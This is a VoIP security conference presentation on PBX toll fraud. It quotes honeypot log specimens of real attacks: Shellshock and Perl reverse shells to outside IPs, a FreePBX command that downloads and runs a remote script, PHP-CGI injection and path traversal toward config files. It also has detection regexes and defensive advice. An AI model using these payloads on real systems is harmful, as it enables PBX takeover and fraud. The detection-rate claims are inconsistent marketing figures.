No More Fraud! 
Let’s say “enough is enough”
About me 
Flavio E. Goncalves 
CTO of SipPulse (www.sippulse.com) 
Turnkey solutions for VoIP providers and Telcos. 
Anti-Fraud Solutions
Why should you care?
Exposure for a single T1 line 
43200 min/month, US$5/min, 23 lines 
US$ 4.968.000
Why are they doing it?
#1 Allocate a number and a recording in a PRN provider
#2 Find a vulnerable device using Shodan
#3 Make calls and cash your money
INTELLIGENCE GRABBED IN HONEYPOTS
Distribution by country (bar chart)
• US: 117636
• FR: 105603
• DE: 78656
• PS: 32795
• RU: 11910
• TW: 11120
• SC: 10702
• SG: 3736
• GB: 2836
• CA: 1978
TOP Prefixes 
+972 Palestine 
+44 Great Britain 
+86 China 
+20 Egypt
TOP 5 PBX Exploits in September/October
1. Shellshock 
2. PHP/LAMP Injection 
3. SQL injection in Trixbox 
4. Linksys remote code execution 
5. FreePBX Remote Code Execution
#1 Shellshock 
• Exploit Date: 09/2014 
Specimen: 
• [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
• [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
#2 SQL injection in Trixbox 
• Exploit Date: 03/2014 - http://www.exploit-db.com/exploits/32239/
Specimen:
• [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
#3 Linksys Remote Code Execution 
• Exploit Date: 02/2014 - http://www.exploit-db.com/exploits/31683/
Specimen:
• [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
#4 LAMP Attacks 
• Apache/PHP Remote Exploit 
• Exploit date 10/2013 
• Specimen:
• POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
• [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/ 
php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61 
%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%6 
9%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D 
%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%7 
0%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%7 
2%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F% 
73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like 
Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“
#5 CallMeNum (Demo) 
• Exploit date: 03/2012 
• Specimen: 
• GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/n
• Application: system
• Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eqncmpn"); system$_ while<>;'
Unknown Exploits 
• Jul/2014 
• Specimen: 
[03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php
[03/Jul/2014] "GET /fuxkkk.php
[03/Jul/2014] "GET /recordings/theme/alexpass.php
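The specimens above translate directly into log-triage rules for a PBX web server. The following is an added example, not code from the presentation or from TFPS: the rule names, the `classify` and `triage` helpers and the sample log lines (documentation-range IPs, harmless payloads) are constructed for illustration, and the patterns are derived only from the request paths shown on the slides.

```python
import re
from urllib.parse import unquote_plus

# Fields of an Apache combined-format line that the rules below need.
LOG_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"\s*$')

# (rule name, field to inspect, pattern); names are hypothetical labels.
SIGNATURES = [
    ("shellshock", "headers", re.compile(r"\(\)\s*\{")),
    ("php-cgi-arg-injection", "target",
     re.compile(r"/cgi-bin/php\d*\?.*-d\s+\w[\w.]*=", re.I)),
    ("trixbox-conf-cdr", "target", re.compile(r"/web-meetme/conf_cdr\.php", re.I)),
    ("linksys-tmunblock", "target", re.compile(r"/tmUnblock\.cgi", re.I)),
    ("freepbx-callmenum", "target",
     re.compile(r"/recordings/misc/callme_page\.php\?.*callmenum=", re.I)),
    ("freepbx-config-api", "target",
     re.compile(r"/admin/config\.php\?.*handler=api.*function=system", re.I)),
    ("vtiger-traversal", "target", re.compile(r"/vtigercrm/.*(\.\./|\x00)", re.I)),
    ("freeswitch-provision", "target",
     re.compile(r"/app/provision/index\.php\?.*mac=", re.I)),
]

def classify(line):
    """Return timestamp, status and matching rule names, or None if unparsable."""
    m = LOG_RE.search(line)
    if not m:
        return None
    fields = {
        # Decode %XX and '+' first: the PHP-CGI specimen arrives fully encoded.
        "target": unquote_plus(m["target"]),
        "headers": m["referer"] + "\n" + m["ua"],
    }
    hits = [name for name, field, rx in SIGNATURES if rx.search(fields[field])]
    return {"ts": m["ts"], "status": int(m["status"]), "hits": hits}

def triage(lines):
    """Count hits per rule; collect hits the server did not answer with 404."""
    counts, review = {}, []
    for result in filter(None, map(classify, lines)):
        for name in result["hits"]:
            counts[name] = counts.get(name, 0) + 1
            if result["status"] != 404:
                review.append((result["ts"], name, result["status"]))
    return counts, review

# Constructed sample lines: documentation-range IPs, harmless payloads.
SAMPLE = [
    '192.0.2.10 - - [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; echo constructed"',
    '192.0.2.11 - - [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+allow_url_include%3Don+%2Dn HTTP/1.1" 404 492 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"',
    '192.0.2.13 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/graph.php?module=..%2Fmodules%2FSettings HTTP/1.1" 404 537 "-" "-"',
    '192.0.2.14 - - [08/Jul/2014:09:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A hit answered with something other than 404 is only a cue to look at that host first; the status code alone does not show whether the request had any effect.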
Still uncommon 
• MANAGER PORT - 5038 
• H323 - 1720 
• MGCP – 5036 
• TFTP – 69 
• IAX2 - 4569
How hackers are getting into your PBX 
• #1 – SIP Brute Force (Fail2ban is effective)
• #2 – HTTP Exploitation
• #3 – Attacks on phones
• #4 – Caller ID Spoofing
• #5 – Billing/Credit card frauds
Part III – How to defend
#1 Patch everything and upgrade frequently
#2 Use a Firewall
#3 Use a Session Border Controller
#4 Use Encryption
#5 Use an Anti-Fraud System
#1 Patch Everything, update frequently
• Effectiveness: Low
• Risk: High
• Cost: High
#2 Use a Firewall or properly configure iptables
• Effectiveness: High
• Risk: Medium
• Cost: Low
• Absolutely a must-do. At the least, no Internet access to SSH and no Internet access to HTTP/HTTPS.
• No protection against phone attacks
#3 Use a Session Border Controller 
• Effectiveness: Medium 
• Risk: Medium 
• Cost: Very High
#4 Use encryption 
• Effectiveness: Medium
• Risk: Medium
• Cost: High if you intend to do mutual authentication
#5 Use an AntiFraud System 
• Effectiveness: High 
• Risk: Very Low 
• Cost: Medium 
• Comments: Can detect 99.999% of the attacks. It protects against caller ID spoofing, social engineering and phone attacks.
• Limitations: Firewall restrictions are required to avoid tampering with the anti-fraud rules.
Working Together in 2 steps 
1. Make sure your customer’s firewall and fail2ban are configured correctly (You)
2. Partner with us to use TFPS on your customers (Us)
Fraud Prevention for All 
www.tfps.co
How effective is an Anti-Fraud Solution
• 99.989% just by protocol signature.
• Number obtained by comparing the attacks registered on the honeypot against the rules.
[Chart: Anti-Fraud Effectiveness, Detected vs. Undetected]
www.tfps.co || tfps.sippulse.com
1. 99.89% of the attacks prevented by signature detection
2. Collaborative protection. One PBX hacked automatically blocks the IP for the others
3. Mechanism: SIP Redirect
• No additional hardware required.
• Available for OpenSIPS/Freeswitch/Asterisk
Asterisk Code 
[from-internal] ; Set here the context for your users
;FPS for International Calls 
exten=_011[1-9].,1,set(ip=${CHANNEL(recvip)}) 
same=>n,SIPAddHeader(P-Received: ${ip}) 
same=>n,set(ua=${CHANNEL(useragent)}) 
same=>n,SIPAddHeader(P-UA: ${ua}) 
same=>n,set(GROUP()=fps) 
same=>n,set(ncalls=${GROUP_COUNT(fps)}) 
same=>n,SIPAddHeader(P-Calls: ${ncalls}) 
same=>n,set(_original=${EXTEN}) 
same=>n,dial(SIP/fps/${EXTEN:2})
Asterisk Code 
[fps] 
;For calls not approved 
exten=_R.,1,Answer() 
same=>n,playback(unauthorized) ; (Customize here to generate an error message)
same=>n,hangup(21)
;For calls approved
exten=_A.,1,Answer()
same=>n,Dial(SIP/provider/${original}) ; (Customize here to send the call ahead)
same=>n,hangup(16)
Beyond blacklists,
Comparing to other anti-fraud solutions! 
• Pluggable 
• No Additional Hardware 
• Small traffic to be analyzed 
• Small risk, only a few calls can be affected. 
• Easy handling of outages
ANTI-FRAUD, HOW-TO (DEMO)
Thank You! 
• e-mail: flavio@sippulse.com 
• skype: flaviogoncalves1 
• Twitter: @asteriskguide 
• blog.tfps.co
Backup Slides
#6 FreePBX 2.x Code Execution 
• Specimen: 
• [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
#4 VTIGER Exploit (Lots of variations) 
• 0001189: Vtiger CRM - php inject vulnerability 
• Specimen 
• 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"
• 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"
#4 PHP Code Injection Vulnerability 
• Specimen: 
• [03/Jul/2014:13:57:37 +0000] "GET 
/admin/footer.php?php=info&ip=perl%20-MIO%20- 
e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3 
Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%22 
93.170.130.201%3A3333%22)%3B%20STDIN- 
%3Efdopen(%24c%2Cr)%3B%20%24~- 
%3Efdopen(%24c%2Cw)%3B%20%24c- 
%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20s 
ystem%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 
"-" "-“ 
• "GET /admin/footer.php?php=info&ip=perl -MIO -e 
'$p=fork;exit,if($p); $c=new 
IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); 
STDIN->fdopen($c,r); $~->fdopen($c,w); $c- 
>write("]QAfH#.Eqnunkn"); system$_ while<>;'
#9 FreePBX Extension Dump 
Exploitation 
• Specimen: 
• 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"
#6 Freeswitch Attacks 
GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys
#4 Caller ID Spoofing 
• 1 - Send 1 million calls and cancel 
• 2 - Fake the callerID to a PRN 
• 3 - Wait for the call back.
Open Source is a Target! 
• We are seeing scans for:
• Vicidial
• Astpp
• phpMyAdmin (hot)
• Tomcat
• JBoss
• FreeSWITCH
First way to protect 
1. Make sure your system is protected by a firewall
1. Vulnerability SCAN
2. Apply firewall rules to prevent unauthorized access to the server
3. Use .htaccess and implement dual authentication
# 5 SIP Phone Recent Vulnerabilities 
• Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10)
• Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3)
• Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9)
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3427
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/


No More Fraud, Astricon, Las Vegas 2014


Editor's Notes

  1. Hello everybody. In the first place I would like to say thanks to the Astricon staff for this wonderful event at Las Vegas and the opportunity to be talking with you. It is a pleasure and honor for me to be here today. Our presentation today will cover the Fraud issue. It is not new, but unfortunately it is still here and growing. It is time to say enough is enough. There is no technical justification to be defrauded these days. There are lots of tools available and we can work together to make sure your server is protected against these criminals.
  2. Let me briefly introduce myself. I’m CEO of SipPulse, a softswitch developer located in Brazil. We provide turnkey solutions for ITSPs and also Anti-Fraud solutions for PBXs.
  3. #1 You don’t want to bankrupt your customers. An IP-PBX is one of the few technologies that can bankrupt your customer in less than 30 days. To work with IP-PBX and TDM trunks is actually very dangerous, because there are no limits in phone bills. #2 You don’t want to defend yourself in court. In many cases, mainly when you are doing Software as a Service, you can be liable for the security of the solution. #3 You don’t want to stigmatize the Asterisk PBX market and slow sales. If some customers realize the potential dangers of implementing an IP-PBX, many would give up without even starting. Fraud is bad for business. #4 You don’t want the investments in IP telephony going to phone bills. Fraud can consume the customer’s yearly budget.